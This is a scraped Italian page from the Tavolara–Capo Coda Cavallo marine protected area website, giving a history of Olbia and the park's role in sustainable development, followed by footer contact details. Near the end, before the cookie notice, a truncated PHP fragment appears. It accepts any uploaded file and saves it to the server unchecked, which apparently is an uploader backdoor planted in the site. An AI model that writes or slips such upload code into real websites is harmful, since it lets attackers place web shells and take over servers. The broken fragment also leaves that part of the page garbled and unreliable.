Home » Territorio » I 3 comuni » Olbia

Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

Olbia

Olbia rappresenta il cuore dell’Area Marina Protetta comprendendo, all’interno del suo territorio comunale, le isole di Tavolara, Molara e Molarotto. 

Il suo porto naturale è stato, fin dall’antichità, motore di un intensa vita sociale e commerciale per la città. La civiltà nuragica, i Punici e i Romani furono le popolazioni che si susseguirono nel tempo e che sfruttarono le potenzialità del territorio. 

I Romani potenziarono il porto che diventò un importate punto di snodo per gli scambi con il resto della penisola ed anche una strategica base navale militare. Con la fine dell’Impero Romano d’occidente, la città di Olbia conobbe un primo periodo di decadenza. 

I Vandali la attaccarono, distruggendola e affondando le navi ormeggiate al porto. I resti delle navi affondate sono oggi esposte nel museo archeologico adiacente al molo B. Brin. Olbia vive un periodo di relativa tranquillità durante i Giudicati quando, tra la fine del XI e l’inizio XII secolo, viene edificata la basilica di San Simplicio, patrono della città. 

Con la conquista degli Aragonesi e lo spostamento dei traffici marittimi dalla penisola italiana a quella iberica, Olbia ricade in un fase buia e rovinosa. La malaria e le continue aggressioni subite dalla città, costringono la popolazione a spostarsi nelle zone più interne della Gallura e nella vicina Corsica. 

Bisogna aspettare la seconda metà del XIX secolo per la rinascita di Olbia. La riqualificazione del porto, il ripristino delle attività commerciali con la penisola italiana, la linea ferroviaria Cagliari – Chilivani - Olbia riportano il benessere e un consistente incremento demografico. 

Con l’alba del XX secolo nasce ad Olbia un periodo di crescita economica, sociale e culturale tuttora esistente. Lo sviluppo turistico improvviso è stato sicuramente il motore del boom socio - economico. Questo progresso ha dato poco spazio ad una riflessione sul nostro vivere e sul nostro rapporto con l’ambiente. 

La funzione dell’ Area Marina Protetta di Tavolara – Capo Coda Cavallo nel contesto di una città come Olbia, è anche quella di promuovere un nuovo modello di sviluppo più sostenibile, attento alla persona e all’ambiente.

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.